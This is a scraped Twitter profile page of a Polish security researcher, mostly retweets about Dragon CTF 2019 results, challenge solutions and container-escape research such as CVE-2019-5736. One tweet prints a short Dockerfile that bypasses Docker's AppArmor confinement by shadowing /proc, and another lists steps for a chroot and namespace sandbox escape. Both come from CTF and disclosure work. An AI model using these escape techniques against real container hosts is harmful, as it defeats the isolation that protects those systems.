|
Adam Iwaniuk
@
adam_iwaniuk
Warszawa, Polska
|
|
Cybersecurity
|
|
|
13
Tweetovi
|
128
Pratim
|
530
Osobe koje vas prate
|
| Tweetovi |
| Adam Iwaniuk proslijedio/la je tweet | ||
|
Dragon Sector
@DragonSectorCTF
|
2. sij |
|
2019 was a great year for Dragon Sector!
🏆1st place at CTFTime.org global ranking for the 2nd year in a row & 3rd time in the history of our team
🥇1st place at 2 CTFs
🥈2nd place at 5 CTFs
🥉3rd place at 5 CTFs
💻And also organized a well received Dragon CTF 2019! pic.twitter.com/YdRrLp2mO2
|
||
|
|
||
| Adam Iwaniuk proslijedio/la je tweet | ||
|
Dragon Sector
@DragonSectorCTF
|
18. stu |
|
We've released our solution slides for the Dragon CTF 2019:
docs.google.com/presentation/d…
See also: blog.dragonsector.pl/2019/11/dragon…
|
||
|
|
||
| Adam Iwaniuk proslijedio/la je tweet | ||
|
Dragon Sector
@DragonSectorCTF
|
16. stu |
|
Congratz to DragonCTF 2019 winners!
TOP1: p4 (@p4_team)
TOP2: PPP (@PlaidCTF)
TOP3: ALLES! (@allesctf)
GG, WP!
ctftime.org/event/887 pic.twitter.com/BAE8Tz1ggg
|
||
|
|
||
| Adam Iwaniuk proslijedio/la je tweet | ||
|
leoluk@chaos.social
@leolukde
|
22. ruj |
|
Our writeup/bug report for the AppArmor bypass: github.com/opencontainers… @allesctf
|
||
|
|
||
| Adam Iwaniuk proslijedio/la je tweet | ||
|
Borys Popławski
@boryspop
|
22. ruj |
|
Trusted Loading 2 solution (from DragonCTF 2019 Teaser):
- get a not chrooted process from stage1 (in trusted loader's ns)
- symlink chroot dir to /
- spawn new process in the sandbox (now not chrooted)
- unshare user,pid,mount ns
- mount proc, get fd for /proc/self/ns/user
(1/2)
|
||
|
|
||
| Adam Iwaniuk proslijedio/la je tweet | ||
|
A girl has no name 🏳️⚧️
@mwk4
|
22. ruj |
|
Here's a little something that I made for (now-finished) Dragon CTF 2019 Teaser by @DragonSectorCTF : github.com/koriakin/cpuad… (blackbox CPU reverse engineering) — have fun!
|
||
|
|
||
|
Adam Iwaniuk
@adam_iwaniuk
|
22. ruj |
|
It was intended solution to one of the challenges in DragonCTF organized by @DragonSectorCTF this weekend. It was solved by one team, @allesctf congratulations!
|
||
|
|
||
|
Adam Iwaniuk
@adam_iwaniuk
|
22. ruj |
|
Docker apparmor bypass:
FROM ubuntu:18.04
# get rid of procfs
VOLUME /proc
# fake files to avoid fail on run
COPY empty /proc/self/attr/exec
COPY empty /proc/self/fd/4
COPY empty /proc/self/fd/5
COPY empty /proc/self/status
# cmd will not have apparmor restrictions
CMD YOUR_CMD
|
||
|
|
||
| Adam Iwaniuk proslijedio/la je tweet | ||
|
Dragon Sector
@DragonSectorCTF
|
18. ruj |
|
Teaser Dragon CTF 2019 is taking place this weekend!
Sat, 21 Sept. 2019, 12:00 UTC — Sun, 22 Sept. 2019, 12:00 UTC
ctf.dragonsector.pl
ctftime.org/event/851
Format: online, jeopardy, team-based (no size limit), teaser, ranked
𝑯𝒂𝒗𝒆 𝑭𝒖𝒏 𝑮𝒐𝒐𝒅 𝑳𝒖𝒄𝒌!
(1/4) pic.twitter.com/wyDyoK8pES
|
||
|
|
||
| Adam Iwaniuk proslijedio/la je tweet | ||
|
qwertyoruiop
@qwertyoruiopz
|
29. ožu |
|
CCC CTF is the new Pwn2Own twitter.com/_niklasb/statu…
|
||
|
|
||
|
Adam Iwaniuk
@adam_iwaniuk
|
29. ožu |
|
Yep, I found this while solving filemanager challange by @_tsuro and managed to solve it using this. Then I reported this to chromium.
|
||
|
|
||
| Adam Iwaniuk proslijedio/la je tweet | ||
|
Borys Popławski
@boryspop
|
12. velj |
|
Check out our blog post about research @adam_iwaniuk and I did that lead to CVE-2019-5736!
blog.dragonsector.pl/2019/02/cve-20…
|
||
|
|
||
| Adam Iwaniuk proslijedio/la je tweet | ||
|
stephen
@_tsuro
|
12. velj |
|
If you enjoyed that recent runc bug you should try out my namespace challenge from the #35c3ctf: 35c3ctf.ccc.ac/uploads/namesp…
|
||
|
|
||